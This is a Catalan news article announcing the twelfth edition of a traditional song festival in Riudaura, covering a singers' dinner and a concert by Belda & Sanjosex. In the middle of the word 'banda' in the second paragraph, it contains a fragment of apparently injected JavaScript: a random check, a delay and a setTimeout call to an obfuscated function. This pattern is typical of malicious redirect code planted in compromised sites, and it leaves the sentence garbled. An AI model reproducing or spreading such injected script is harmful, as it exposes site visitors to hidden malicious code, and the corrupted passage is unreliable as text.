Aquesta nit tindrà lloc la dotzena edició de la proposta de música tradicional i popular D’aquí estant veig una estrella a Riudaura

Comparteix-ho amb els teus amics:

Aquest divendres, Els Tranquils actuaran al sopar de cantadors i dissabte, Belda&Sanjosex interpretaran les peces del Càntut, un recull de les cançons de tradició oral.

Els dies 28 i 29 de juliol se celebrarà a la Plaça del Gambeto de Riudaura la dotzena edició de la proposta de música tradicional i popular D’aquí estant veig una estrella -cançons i tonades tradicionals a Riudaura-.

Després de més d’una dècada del primer concert, es manté la programació a dos dies encetada l’any passat, amb l’objectiu de treballar més intensament amb els dos propòsits que van portar a l’Ajuntament de Riudaura i al Grup de Recerca Folklòrica de la Garrotxa, del Marboleny, a tirar endavant aquest projecte. D’una bandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda, per la difusió d’un patrimoni (musical, literari, sociocultural i històric) sorgit d’un treball de camp, amb els enregistraments i les transcripcions corresponents, i per altra, per la decidida voluntat que aquests materials recuperin espais de difusió en la societat actual, molt distinta d’aquella que els va veure sorgir i transmetre’s de generació en generació.

El divendres 28, a les 9 del vespre, tindrà lloc novament el Sopar de cantadors que aquesta edició comptarà amb l’actuació del grup osonenc de polifonia vocal Els Tranquils format per Ramon Manent, Andreu Coll i Manel Gost. Els tiquets pel sopar es poden adquirir al mateix Ajuntament de Riudaura al preu de 15€ i pels menors d’11 anys a 8€.

El dissabte 29 de juliol, a les 10 del vespre, tindrà lloc el tradicional concert que aquest 2017 comptarà amb l’actuació de Carles Belda i Carles Sanjosé  (Sanjosex) que portaran a l’escenari de Riudaura, la proposta Càntut, un treball discogràfic on recuperen i revisen les cançons de tradició oral recollides arreu de les comarques gironines. Un projecte que ha estat reconegut amb el Premi Enderrock al millor disc folk de 2017, segons la crítica, i el premi Teresa Rebull que atorga la Fira Mediterrània i que parteix des materials de la web Càntut impulsada per Albert Massip.

L’aportació local com cada any vindrà de la mà dels Músics de Riudaura i de la participació també d’una vintena de veïns del poble que interpretaran cançons des dels mateixos balcons de la Plaça: els Cantadors de Riudaura. Sens dubte, el que ha donat personalitat, autenticitat i que fa únic el concert D’aquí estant veig una estrella és precisament la intervenció dels propis riudaurencs en l’actualització i transmissió del seu cançoner tradicional.

En el concert, la Comissió de Festes de Riudaura oferirà servei de bar i entrepans abans i després del concert. Aquest any, també es donarà l’oportunitat a tots els assistents que ho desitgin de fer una aportació econòmica voluntària per a sufragar les despeses d’organització del festival.

VÍDEO RELACIONAT:

Vídeo: 10a edició del D’aquí estant veig una estrella 2015

https://vimeo.com/135168323

Comparteix-ho amb els teus amics: